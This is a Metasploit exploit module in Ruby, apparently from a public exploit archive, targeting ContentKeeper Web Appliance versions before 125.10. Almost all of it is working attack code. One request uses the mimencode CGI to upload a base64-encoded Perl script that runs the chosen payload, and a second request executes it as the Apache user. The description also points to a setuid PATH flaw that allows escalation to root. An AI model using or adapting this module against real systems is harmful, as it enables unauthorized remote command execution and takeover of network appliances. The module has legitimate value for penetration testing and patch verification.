ContentKeeper Web Appliance < 125.10 Command Execution

                                                ##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'ContentKeeper Web Remote Command Execution',
			'Description'	=> %q{
				This module exploits the ContentKeeper Web Appliance. Versions prior
				to 125.10 are affected. This module exploits a combination of weaknesses
				to enable remote command execution as the Apache user. Following exploitation
				it is possible to abuse an insecure PATH call to 'ps' etc in setuid 'benetool'
				to escalate to root.
			},
			'Author' 	=> [ 'patrick' ],
			'Arch'		=> [ ARCH_CMD ],
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision$',
			'References'    =>
			[
				[ 'OSVDB', '54551'],
				[ 'OSVDB', '54552'],
				[ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],
			],
			'Privileged'		=> false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 1024,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby telnet',
						}
				},			
			'Platform' => ['unix'],
			'Targets'  =>
			[
				[ 'Automatic', { } ]
			],
			'DisclosureDate' => 'Feb 25 2009',
			'DefaultTarget' => 0))

			register_options(
			[
				Opt::RPORT(80),
			],self.class)
	end

	def check
		connect
		sock.put("GET /cgi-bin/ck/mimencode HTTP/1.0\r\n\r\n")
		banner = sock.get(-1,3)
		disconnect

		if (banner =~ /500 Internal/)
			return Exploit::CheckCode::Vulnerable
		end
			return Exploit::CheckCode::Safe
	end

	def exploit

		exp = "#!/usr/bin/perl\n"
		exp << "print \"Content-type: text/html\\n\\n\"\;\n\n"
		exp << "system(\""
		exp << payload.encoded.gsub('"', '\"')
		exp << "\");\n"

		body = Rex::Text.encode_base64(exp)

		connect

		sploit = "POST /cgi-bin/ck/mimencode?-u+-o+bak.txt HTTP/1.1\r\n"
		sploit << "Host: #{datastore['RHOST']}\r\n"
		sploit << "Content-Length: #{body.length}\r\n\r\n"

		print_status("Uploading payload to target.")
		sock.put(sploit + body + "\r\n\r\n")
		disconnect

		sleep(5)
		print_status("Calling payload...")
		connect
		req = "GET /cgi-bin/ck/bak.txt HTTP/1.1\r\n" # bak.txt is owned by apache, chmod 777 :) rwx
		req << "Host: #{datastore['RHOST']}\r\n"
		sock.put(req + "\r\n\r\n")

		handler
		disconnect
	end
end